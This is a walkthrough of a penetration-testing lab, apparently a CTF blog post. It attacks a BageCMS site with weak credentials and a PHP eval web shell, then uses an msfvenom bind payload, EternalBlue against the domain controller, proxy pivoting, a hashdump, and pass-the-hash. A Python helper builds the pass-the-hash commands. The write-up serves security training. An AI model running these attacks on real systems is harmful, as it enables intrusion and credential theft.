# [Domain Penetration] cyberstrikelab-lab7

泷羽Sec, 2025-12-13
## Web penetration

Port 9652 runs BageCMS (八哥CMS). Full port scan of the entry host with fscan (banner omitted):

```
PS C:\Users\xt350> fscan.exe -h 192.168.10.10 -p 1-65000

fscan version: 1.8.4
start infoscan
192.168.10.10:139 open
192.168.10.10:135 open
192.168.10.10:445 open
192.168.10.10:3306 open
192.168.10.10:5040 open
192.168.10.10:7680 open
192.168.10.10:9652 open
192.168.10.10:49664 open
192.168.10.10:49666 open
192.168.10.10:49665 open
192.168.10.10:49669 open
192.168.10.10:49668 open
192.168.10.10:49667 open
192.168.10.10:49670 open
[*] alive ports len is: 14
start vulscan
[*] WebTitle http://192.168.10.10:9652 code:200 len:14625 title:网站标题-网站标题 - Powered By BageCMS
已完成 14/14
[*] 扫描结束,耗时: 4m16.0065058s
```

http://192.168.10.10:9652/install.txt leaks the admin backend URL. Logging in to the backend with the weak credentials admin / admin123456 shows the CMS version is BageCMS 3.1.0. Edit the site's homepage template source and insert a one-line PHP web shell:

```php
<?php @eval($_POST['a']);?>
```

Generate an msf payload, run it on the target through the web shell, and start the handler. Note that `windows/meterpreter/bind_tcp` listens on the target, so the handler's RHOST is the target's address and the LHOST passed to msfvenom is not used by a bind payload:

```
msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set RHOST 192.168.10.10; set LPORT 4444; exploit -j -z"
```

## Internal network penetration

The web host is dual-homed: a second NIC sits in 192.168.20.0/24.

```
C:\phpstudy_pro\WWW>ipconfig

Windows IP Configuration

Ethernet adapter 以太网实例 0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::8c17:fbcc:901f:c897%6
   IPv4 Address. . . . . . . . . . . : 192.168.10.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.10.233

Ethernet adapter 以太网实例 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::fd48:8021:9701:9c1d%14
   IPv4 Address. . . . . . . . . . . : 192.168.20.10
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.20.1
```

Scan the internal segment from the foothold (banner omitted):

```
C:\phpstudy_pro\WWW>fscan.exe -h 192.168.20.10/24

fscan version: 1.8.1
start infoscan
(icmp) Target 192.168.20.10 is alive
(icmp) Target 192.168.20.20 is alive
(icmp) Target 192.168.20.40 is alive
[*] Icmp alive hosts len is: 3
192.168.20.20:445 open
192.168.20.10:445 open
192.168.20.10:7680 open
192.168.20.40:88 open
192.168.20.20:3306 open
192.168.20.10:3306 open
192.168.20.40:445 open
192.168.20.40:139 open
192.168.20.20:139 open
192.168.20.10:139 open
192.168.20.40:135 open
192.168.20.20:135 open
192.168.20.10:135 open
[*] alive ports len is: 13
start vulscan
[+] NetInfo:
[*]192.168.20.40
   [->]WIN-137FCI4D99A
   [->]192.168.20.40
[+] NetInfo:
[*]192.168.20.20
   [->]cyberweb
   [->]192.168.20.20
[+] 192.168.20.40 MS17-010 (Windows Server 2016 Standard 14393)
[*] 192.168.20.40 [+]DC CYBERSTRIKELAB\WIN-137FCI4D99A Windows Server 2016 Standard 14393
[*] 192.168.20.20 CYBERSTRIKELAB\CYBERWEB Windows Server 2012 R2 Standard 9600
已完成 13/13
[*] 扫描结束,耗时: 14.733617s
```

The domain controller is 192.168.20.40 (Kerberos on 88, flagged as DC) and fscan reports it vulnerable to MS17-010 (EternalBlue). Use the msf command-execution module to read the second flag:

```
use admin/smb/ms17_010_command
set command type c:\\flag.txt
set rhosts 192.168.20.40
run
```

Configure routing so msf modules can reach 192.168.20.0/24 through the first meterpreter session (the DC is not reachable from Kali directly):

```
run post/multi/manage/autoroute
```

Start a SOCKS proxy on top of that route; the `proxychains` prefix used in the final step relies on this listener (proxychains.conf pointing at the msf host's port 1080, SOCKS5):

```
use auxiliary/server/socks_proxy
set VERSION 5
set SRVPORT 1080
run -j
```

On the local machine, point Proxifier at the Kali msf IP and SOCKS port. Open a remote desktop connection with local resource sharing enabled and copy the msf bind payload onto the target. Configure msf and get ready for the session.

The remote login is an ordinary user, not SYSTEM, so hashes cannot be dumped from that session. EternalBlue is used instead to execute the payload as SYSTEM:

```
msf auxiliary(admin/smb/ms17_010_command) > set command C:\\Users\\xiaoyu\\Desktop\\shell.exe
command => C:\Users\xiaoyu\Desktop\shell.exe
msf auxiliary(admin/smb/ms17_010_command) > run

[*] 192.168.20.40:445 - Target OS: Windows Server 2016 Standard 14393
[*] 192.168.20.40:445 - Built a write-what-where primitive...
[+] 192.168.20.40:445 - Overwrite complete... SYSTEM session obtained!
[+] 192.168.20.40:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.20.40:445 - Getting the command output...
[*] 192.168.20.40:445 - Command finished with no output
[*] 192.168.20.40:445 - Executing cleanup...
[+] 192.168.20.40:445 - Cleanup was successful
[+] 192.168.20.40:445 - Command completed successfully!
[*] 192.168.20.40:445 - Output for "C:\Users\xiaoyu\Desktop\shell.exe":

[*] 192.168.20.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Because the payload is a bind shell, the handler connects to it after execution. The connection goes out through the routed session, as the "via session 3" in the session line shows:

```
msf auxiliary(admin/smb/ms17_010_command) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/bind_tcp
msf exploit(multi/handler) > show options

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.20.40    no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.

msf exploit(multi/handler) > run -j
[*] Exploit running as background job 5.
[*] Exploit completed, but no session was created.
[*] Started bind TCP handler against 192.168.20.40:4444
msf exploit(multi/handler) >
[*] Sending stage (177734 bytes) to 192.168.20.40
[*] Meterpreter session 4 opened (192.168.20.10:50929 -> 192.168.20.40:4444 via session 3) at 2025-12-11 02:21:05 -0500

msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-JFB57A8  10.10.10.173:36245 -> 192.168.10.10:4444 (192.168.10.10)
  4         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN-137FCI4D99A  192.168.20.10:50929 -> 192.168.20.40:4444 via session 3 (192.168.20.40)

msf exploit(multi/handler) > sessions 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

Use msf's hashdump to get the domain controller's administrator hash. On a DC this dumps the domain accounts, including krbtgt:

```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8174fc8c5ee7a8e460df2e61d00bd3c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f230bc7afd28cc6d52aab59e6e31fd6a:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cyberweb:1106:aad3b435b51404eeaad3b435b51404ee:214352b7762ea8894f78edcbf5748a05:::
xiaoyu:1107:aad3b435b51404eeaad3b435b51404ee:73f5d97549f033374fa6d9f9ce247ffd:::
WIN-137FCI4D99A$:1000:aad3b435b51404eeaad3b435b51404ee:44ec20bd68d4e22d3428a97d15f441dd:::
CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:664117f18ce890f00499a80e2fb92904:::
```

Pass the hash to 192.168.20.20 through the SOCKS pivot to take the last machine. The LM half of `-hashes` is left empty because `aad3b435b51404eeaad3b435b51404ee` is the empty LM hash (LM storage disabled), so only the NT hash matters:

```
proxychains impacket-psexec -hashes :d8174fc8c5ee7a8e460df2e61d00bd3c cyberstrikelab.com/Administrator@192.168.20.20
```
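The hashdump-to-PTH step above is easy to get wrong when the dump is long: machine accounts (`$`) and accounts whose NT hash is the empty-password value are not useful logon targets, and the `-hashes` argument wants `LM:NT` with the LM half blank. The following script is an added example, not code from the original post or from the CyberStrikeLab authors. It parses the pwdump-style lines hashdump prints, classifies each account, and builds the impacket-psexec command. The MD4 routine is a minimal implementation written for this example (hashlib's `md4` is often missing under OpenSSL 3), used to show that `31d6cfe0d16ae931b73c59d7e0c089c0` is exactly the NT hash of an empty password. The sample input is the hashdump output from the post; the domain and target are the lab values used above.

```python
"""Parse Meterpreter hashdump output and build a pass-the-hash command.

Added example, not from the original post. Assumes the pwdump line format
user:rid:lm:nt::: that hashdump prints, and the lab's domain/target.
"""
import struct
from dataclasses import dataclass

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM storage disabled)


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Minimal MD4 (RFC 1320), written for this example; NT hash = MD4(UTF-16LE(password))."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)           # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2_idx = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3_idx = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                              # round 1
            a = _rotl((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c                      # rotate registers (A,B,C,D -> D,A,B,C)
        for i in range(16):                              # round 2
            a = _rotl((a + G(b, c, d) + X[r2_idx[i]] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                              # round 3
            a = _rotl((a + H(b, c, d) + X[r3_idx[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    return md4(password.encode("utf-16le")).hex()


EMPTY_NT = nt_hash("")  # 31d6cfe0d16ae931b73c59d7e0c089c0: empty password


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def is_machine(self) -> bool:
        return self.user.endswith("$")

    @property
    def empty_password(self) -> bool:
        return self.nt == EMPTY_NT


def parse_hashdump(text: str) -> list:
    """Parse pwdump-style lines (user:rid:lm:nt:::); prompts and blank lines are skipped."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts.append(Account(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return accounts


def pth_targets(accounts: list) -> list:
    """User accounts with a real NT hash. krbtgt is excluded: it cannot log on,
    its hash matters for ticket forging rather than pass-the-hash."""
    return [a for a in accounts
            if not a.is_machine and not a.empty_password and a.user.lower() != "krbtgt"]


def psexec_pth_command(account: Account, domain: str, target: str) -> str:
    """impacket-psexec wants LM:NT; the LM half is blank because LM is not stored."""
    return f"proxychains impacket-psexec -hashes :{account.nt} {domain}/{account.user}@{target}"


# hashdump output from the post, used here as sample input
HASHDUMP = """\
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8174fc8c5ee7a8e460df2e61d00bd3c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f230bc7afd28cc6d52aab59e6e31fd6a:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cyberweb:1106:aad3b435b51404eeaad3b435b51404ee:214352b7762ea8894f78edcbf5748a05:::
xiaoyu:1107:aad3b435b51404eeaad3b435b51404ee:73f5d97549f033374fa6d9f9ce247ffd:::
WIN-137FCI4D99A$:1000:aad3b435b51404eeaad3b435b51404ee:44ec20bd68d4e22d3428a97d15f441dd:::
CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:664117f18ce890f00499a80e2fb92904:::
"""

if __name__ == "__main__":
    accts = parse_hashdump(HASHDUMP)
    for acc in accts:
        tag = "machine" if acc.is_machine else ("EMPTY password" if acc.empty_password else "user")
        print(f"{acc.user:<18} rid={acc.rid:<5} lm_empty={acc.lm == EMPTY_LM} {tag}")
    admin = next(acc for acc in accts if acc.rid == 500)
    print(psexec_pth_command(admin, "cyberstrikelab.com", "192.168.20.20"))
```

Running it flags Guest and DefaultAccount as empty-password accounts, the two `$` entries as machine accounts, and prints the same psexec line used above for Administrator (RID 500). The machine account hashes are still worth keeping: the DC's own account hash is what a silver ticket or DCSync-style abuse would use, but they are not psexec logon targets.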